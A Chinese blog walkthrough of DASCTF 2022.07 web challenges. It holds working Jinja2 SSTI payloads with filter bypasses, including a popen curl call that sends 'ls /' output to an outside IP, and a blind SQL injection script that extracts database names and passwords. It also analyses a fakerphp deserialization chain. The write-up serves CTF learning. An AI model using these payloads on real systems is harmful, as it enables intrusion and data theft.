<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="google-site-verification" content="TZE0rZyIqLl10trYu3BWBWa1Vmz6HFwhb2OcNEK4u-s" />
     <link rel="shortcut icon" href= /img/favicon.ico >
    <title>
        Sk1y&#39;s Blog
    </title>
    <meta name="description" content= Sk1y's blog >
    <meta name="keywords" content= Blog,Hexo,Theme,coder,Sk1y >
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">


<meta name="generator" content="Hexo 6.2.0"></head>
<body id="bodyx">
    <div class="hd posts">

    <a href="/index.html"><i class="fa fa-home
 replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            DASCTF2022.07赋能赛复现
        </p>
        <hr>
    </div>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DASCTF2022-07%E8%B5%8B%E8%83%BD%E8%B5%9B%E5%A4%8D%E7%8E%B0"><span class="toc-text">DASCTF2022.07赋能赛复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Ez-to-getflag"><span class="toc-text">Ez to getflag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Harddisk"><span class="toc-text">Harddisk</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%9D%E5%AF%B9%E9%98%B2%E5%BE%A1"><span class="toc-text">绝对防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Newser"><span class="toc-text">Newser</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#composer-json%E6%B3%84%E9%9C%B2"><span class="toc-text">composer.json泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%BC%95%E7%94%A8"><span class="toc-text">php引用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%9Ephp%E5%BC%95%E7%94%A8%E6%83%85%E5%86%B5%E4%B8%8B"><span class="toc-text">非php引用情况下</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp%E5%88%86%E6%9E%90"><span class="toc-text">exp分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li></ol>
    <div class="post-content">
        <h1 id="DASCTF2022-07赋能赛复现"><a href="#DASCTF2022-07赋能赛复现" class="headerlink" title="DASCTF2022.07赋能赛复现"></a>DASCTF2022.07赋能赛复现</h1><p>[toc]</p>
<h2 id="Ez-to-getflag"><a href="#Ez-to-getflag" class="headerlink" title="Ez to getflag"></a>Ez to getflag</h2><p>会检查上传的文件的内容，不能存在php,可以使用短标签绕过，但是不知道文件上传的存放路径。</p>
<p>本来以为是文件上传，但是没想到是任意文件读取！！！</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220730174626603.png" alt="image-20220730174626603"></p>
<h2 id="Harddisk"><a href="#Harddisk" class="headerlink" title="Harddisk"></a>Harddisk</h2><p>fuzz，过滤了很多的关键词</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220731131121372.png" alt="image-20220731131121372"></p>
<p>其中大括号可以使用<code>&#123;%print(......)%&#125;</code>或<code>&#123;% if ... %&#125;1&#123;% endif %&#125;</code>的形式来代替，而print被过滤，所以用后者</p>
<p>根据过滤信息，<code>[]</code>，<code>点</code>，<code>class</code>等关键词都被过滤，所以使用attr和unicode编码进行绕过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>.__class__)%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;__class__&quot;</span>))%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f&quot;</span>))%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br></pre></td></tr></table></figure>

<p>如果执行成功，回显555</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220731180108482.png" alt="image-20220731180108482"></p>
<p>因为只能根据是否回显555来判断，相当于盲注，所以用自动化脚本来判断寻找可以用的类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;__class__&quot;</span>)|attr(<span class="string">&quot;__base__&quot;</span>)|attr(<span class="string">&quot;__subclasses__&quot;</span>)()|attr(<span class="string">&quot;__getitem__&quot;</span>)(xx)|attr(<span class="string">&quot;__init__&quot;</span>)|attr(<span class="string">&quot;__globals__&quot;</span>)|attr(<span class="string">&quot;__getitem__&quot;</span>)(<span class="string">&quot;popen&quot;</span>))%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br><span class="line"></span><br><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f&quot;</span>)()|attr(<span class="string">&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;</span>)(<span class="number">132</span>)|attr(<span class="string">&quot;\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;</span>)(<span class="string">&quot;\u0070\u006f\u0070\u0065\u006e&quot;</span>))%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br></pre></td></tr></table></figure>

<p>进行爆破，得到132</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220801104937777.png" alt="image-20220801104937777"></p>
<p>因为不能回显，所以使用外带命令实现</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;__class__&quot;</span>)|attr(<span class="string">&quot;__base__&quot;</span>)|attr(<span class="string">&quot;__subclasses__&quot;</span>)()|attr(<span class="string">&quot;__getitem__&quot;</span>)(xx)|attr(<span class="string">&quot;__init__&quot;</span>)|attr(<span class="string">&quot;__globals__&quot;</span>)|attr(<span class="string">&quot;__getitem__&quot;</span>)(<span class="string">&quot;popen&quot;</span>)(<span class="string">&quot;curl 116.62.240.148:7011 -d &quot;</span>`ls /`<span class="string">&quot;&quot;</span>)|attr(<span class="string">&quot;read&quot;</span>)())%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br><span class="line"></span><br><span class="line">&#123;%<span class="keyword">if</span>(<span class="string">&quot;&quot;</span>|attr(<span class="string">&quot;\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0062\u0061\u0073\u0065\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f&quot;</span>)()|attr(<span class="string">&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;</span>)(<span class="number">132</span>)|attr(<span class="string">&quot;\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f&quot;</span>)|attr(<span class="string">&quot;\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f&quot;</span>)(<span class="string">&quot;\u0070\u006f\u0070\u0065\u006e&quot;</span>)(<span class="string">&quot;\u0063\u0075\u0072\u006c\u0020\u0031\u0031\u0036\u002e\u0036\u0032\u002e\u0032\u0034\u0030\u002e\u0031\u0034\u0038\u003a\u0037\u0030\u0031\u0031&quot;</span>)|attr(<span class="string">&quot;\u0072\u0065\u0061\u0064&quot;</span>)())%&#125;<span class="number">555</span>&#123;%endif%&#125;</span><br></pre></td></tr></table></figure>

<p>不知道是不是题目环境问题，curl有时候行，有时候不行，有时候销毁靶机之后就会像下面这样忽然出现一大堆的请求（真神奇）</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220801132613514.png" alt="image-20220801132613514"></p>
<p>而后销毁又申请环境好多次，尝试无果。。。</p>
<h2 id="绝对防御"><a href="#绝对防御" class="headerlink" title="绝对防御"></a>绝对防御</h2><p>JSFinder：查找隐藏在js文件中的api 接口和敏感目录，以及一些子域名</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python JSFinder.py -u http://badcc3c9-4df2-4c54-a430-bc7c8b122353.node4.buuoj.cn:<span class="number">81</span>/</span><br></pre></td></tr></table></figure>

<p>扫描结果</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220801234847743.png" alt="image-20220801234847743"></p>
<p>访问SUPPERAPI.php，查看源代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">getQueryVariable</span>(<span class="params">variable</span>)</span><br><span class="line">&#123;</span><br><span class="line">       <span class="keyword">var</span> query = <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">search</span>.<span class="title function_">substring</span>(<span class="number">1</span>);</span><br><span class="line">       <span class="keyword">var</span> vars = query.<span class="title function_">split</span>(<span class="string">&quot;&amp;&quot;</span>);</span><br><span class="line">       <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>;i&lt;vars.<span class="property">length</span>;i++) &#123;</span><br><span class="line">               <span class="keyword">var</span> pair = vars[i].<span class="title function_">split</span>(<span class="string">&quot;=&quot;</span>);</span><br><span class="line">               <span class="keyword">if</span>(pair[<span class="number">0</span>] == variable)&#123;<span class="keyword">return</span> pair[<span class="number">1</span>];&#125;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">return</span>(<span class="literal">false</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">check</span>(<span class="params"></span>)&#123;</span><br><span class="line">		<span class="keyword">var</span> reg = <span class="regexp">/[`~!@#$%^&amp;*()_+&lt;&gt;?:&quot;&#123;&#125;,.\/;&#x27;[\]]/im</span>;</span><br><span class="line">        <span class="keyword">if</span> (reg.<span class="title function_">test</span>(<span class="title function_">getQueryVariable</span>(<span class="string">&quot;id&quot;</span>))) &#123;</span><br><span class="line">            <span class="title function_">alert</span>(<span class="string">&quot;提示：您输入的信息含有非法字符！&quot;</span>);</span><br><span class="line">            <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span> = <span class="string">&quot;/&quot;</span></span><br><span class="line">         &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">check</span>()</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p><code>window.location.search.substring(1)</code>功能为获取当前页面GET方式请求<code>?后的指定参数</code></p>
<p>这段代码的意思大概为传递调用getQueryVariable，参数为id，该函数中获取<code>?后的请求参数</code>，用<code>&amp;</code>分割，用<code>=</code>分割，取前者，也就是变量名，并将该变量名和<code>id</code>进行对比，成功则返回<code>pair[1]</code></p>
<p>所以要传递变量id，但是接下来怎么利用不清楚，根据官方wp，这里用id进行sql盲注（防护不用管，是前端的防护，直接写脚本就可以）</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220802001640636.png" alt="image-20220802001640636"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">url = <span class="string">&quot;http://badcc3c9-4df2-4c54-a430-bc7c8b122353.node4.buuoj.cn:81/SUPPERAPI.php?&quot;</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">50</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;j=&quot;</span>+<span class="built_in">str</span>(j))</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">35</span>,<span class="number">128</span>):</span><br><span class="line">        payload = <span class="string">&quot;id=1 and ascii(substr(database(),&quot;</span>+<span class="built_in">str</span>(j)+<span class="string">&quot;,1))=&quot;</span>+<span class="built_in">str</span>(i)     <span class="comment"># # 爆库名  ctf</span></span><br><span class="line">        payload = <span class="string">&quot;id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),&quot;</span> + <span class="built_in">str</span>(j) + <span class="string">&quot;,1))=&quot;</span> + <span class="built_in">str</span>(i)   <span class="comment"># 爆表名 users</span></span><br><span class="line">        payload = <span class="string">&quot;id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;),&quot;</span> + <span class="built_in">str</span>(j) + <span class="string">&quot;,1))=&quot;</span> + <span class="built_in">str</span>(i)  <span class="comment">#爆字段名 id,username,password,ip,time,USER</span></span><br><span class="line">        payload = <span class="string">&quot;id=1 and ascii(substr((select password from users where id=2),&quot;</span> + <span class="built_in">str</span>(j) + <span class="string">&quot;,1))=&quot;</span> + <span class="built_in">str</span>(i)  <span class="comment"># 爆password</span></span><br><span class="line">        <span class="comment"># payload = &quot;id=1 and ascii(substr(database(),%d,1))=%s&quot; %(j,str(i))  # 爆库名</span></span><br><span class="line">        <span class="comment"># payload = &quot;id=1 and 2&gt;1&quot;</span></span><br><span class="line">        <span class="comment"># print(payload)</span></span><br><span class="line"></span><br><span class="line">        response = requests.get(url+payload)</span><br><span class="line">        <span class="comment"># print(response.text)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">r&quot;admin&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            flag += <span class="built_in">chr</span>(i)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;flag=&quot;</span>+flag)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>



<h2 id="Newser"><a href="#Newser" class="headerlink" title="Newser"></a>Newser</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$_password</span>;</span><br><span class="line">    <span class="keyword">protected</span> <span class="variable">$_username</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$username</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$password</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$email</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$instance</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$username</span>,<span class="variable">$password</span>,<span class="variable">$email</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;email = <span class="variable">$email</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;username = <span class="variable">$username</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;password = <span class="variable">$password</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;instance = <span class="variable language_">$this</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> mixed</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getEmail</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;email;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> mixed</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getPassword</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;password;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> mixed</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getUsername</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;username;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__sleep</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;_password = <span class="title function_ invoke__">md5</span>(<span class="variable">$this</span>-&gt;password);</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;_username = <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$this</span>-&gt;username);</span><br><span class="line">        <span class="keyword">return</span> [<span class="string">&#x27;_username&#x27;</span>,<span class="string">&#x27;_password&#x27;</span>, <span class="string">&#x27;email&#x27;</span>,<span class="string">&#x27;instance&#x27;</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;password = <span class="variable language_">$this</span>-&gt;_password;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;User &quot;</span>.<span class="variable language_">$this</span>-&gt;instance-&gt;_username.<span class="string">&quot; has created.&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125; User bWlubmllLndlaW1hbm4= has created.</span><br></pre></td></tr></table></figure>







<p>对cookie进行base64解码</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220806191259786.png" alt="image-20220806191259786"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">4</span>:<span class="string">&quot;User&quot;</span>:<span class="number">4</span>:&#123;s:<span class="number">12</span>:<span class="string">&quot;*_username&quot;</span>;s:<span class="number">12</span>:<span class="string">&quot;ZGVyZWswNQ==&quot;</span>;s:<span class="number">12</span>:<span class="string">&quot;*_password&quot;</span>;s:<span class="number">32</span>:<span class="string">&quot;03a83270035a975b5150954956db1a46&quot;</span>;s:<span class="number">11</span>:<span class="string">&quot;Useremail&quot;</span>;s:<span class="number">17</span>:<span class="string">&quot;levi87@barton.com&quot;</span>;s:<span class="number">14</span>:<span class="string">&quot;Userinstance&quot;</span>;r:<span class="number">1</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>cookie是User类对象的序列化</p>
<p>而页面回显的<code>User ZGVyZWswNQ== has created.</code>表示<code>__destruct</code>方法被调用，找反序列化利用链</p>
<h3 id="composer-json泄露"><a href="#composer-json泄露" class="headerlink" title="composer.json泄露"></a>composer.json泄露</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="string">&quot;require&quot;</span>: &#123;</span><br><span class="line">    <span class="string">&quot;fakerphp/faker&quot;</span>: <span class="string">&quot;^1.19&quot;</span>,</span><br><span class="line">    <span class="string">&quot;opis/closure&quot;</span>: <span class="string">&quot;^3.6&quot;</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<blockquote>
<p>对于fakerphp这个依赖，他的Generator类，是主要的类，生成不存在的属性时都通过format方法，这个方法中存在call_user_func_array 的调用</p>
</blockquote>
<p>关键的函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$attribute</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">trigger_deprecation</span>(<span class="string">&#x27;fakerphp/faker&#x27;</span>, <span class="string">&#x27;1.14&#x27;</span>, <span class="string">&#x27;Accessing property &quot;%s&quot; is deprecated, use &quot;%s()&quot; instead.&#x27;</span>, <span class="variable">$attribute</span>, <span class="variable">$attribute</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">format</span>(<span class="variable">$attribute</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">format</span>(<span class="params"><span class="variable">$format</span>, <span class="variable">$arguments</span> = []</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ invoke__">call_user_func_array</span>(<span class="variable">$this</span>-&gt;<span class="title function_ invoke__">getFormatter</span>(<span class="variable">$format</span>), <span class="variable">$arguments</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;formatters = [];</span><br><span class="line">    &#125;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getFormatter</span>(<span class="params"><span class="variable">$format</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;formatters[<span class="variable">$format</span>])) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;formatters[<span class="variable">$format</span>];</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>



<p>注意Faker\Generator类中有一个<code>__wakeup</code>方法，会将<code>formatters</code>的值替换为空，所以无论我们刚开始对formatters赋值的是什么，都会在<code>__wakeup</code>这里将其替换为空数组</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable language_">$this</span>-&gt;formatters = [];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>官方wp中，这里用的是<code>php引用</code>来绕过，比较关键的是<code>该引用语句执行在 Generator类的__wakeup 后</code></p>
<p>因为不是很理解，所以本地调试一下，设置了formatters的两种情况</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807001238313.png" alt="image-20220807001238313"></p>
<h3 id="php引用"><a href="#php引用" class="headerlink" title="php引用"></a>php引用</h3><p>当其为地址时，在<code>Faker\Generator</code>的wakeup执行前，这个formatters为null，wakeup执行后，其变为空数组</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807001458924.png" alt="image-20220807001458924"></p>
<p>而在User类的wakeup执行后，这个formatters变为了<code>[&quot;_username&quot;=&gt;&quot;phpinfo&quot;]</code></p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807001702781.png" alt="image-20220807001702781"></p>
<p>这是一个很有趣的现象，这就导致了wakeup方法的防护是无用的，可以通过php引用对对象任意赋值</p>
<h3 id="非php引用情况下"><a href="#非php引用情况下" class="headerlink" title="非php引用情况下"></a>非php引用情况下</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$obj</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// $this-&gt;formatters = &amp;$obj-&gt;password;</span></span><br><span class="line">    <span class="variable language_">$this</span>-&gt;formatters = [<span class="string">&quot;_username&quot;</span>=&gt;<span class="string">&quot;phpinfo&quot;</span>];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>虽然<code>Faker\Generator</code>类对象在wakeup函数执行前，formatters为<code>[&quot;_username&quot;=&gt;&quot;phpinfo&quot;]</code>，但是在wakeup函数执行后，还是被修改为了空数组</p>
<p>并且因为没有使用php引用，所以formatters始终为空数组</p>
<p><img src="https://sk1y2333.oss-cn-beijing.aliyuncs.com/img/image-20220807002107803.png" alt="image-20220807002107803"></p>
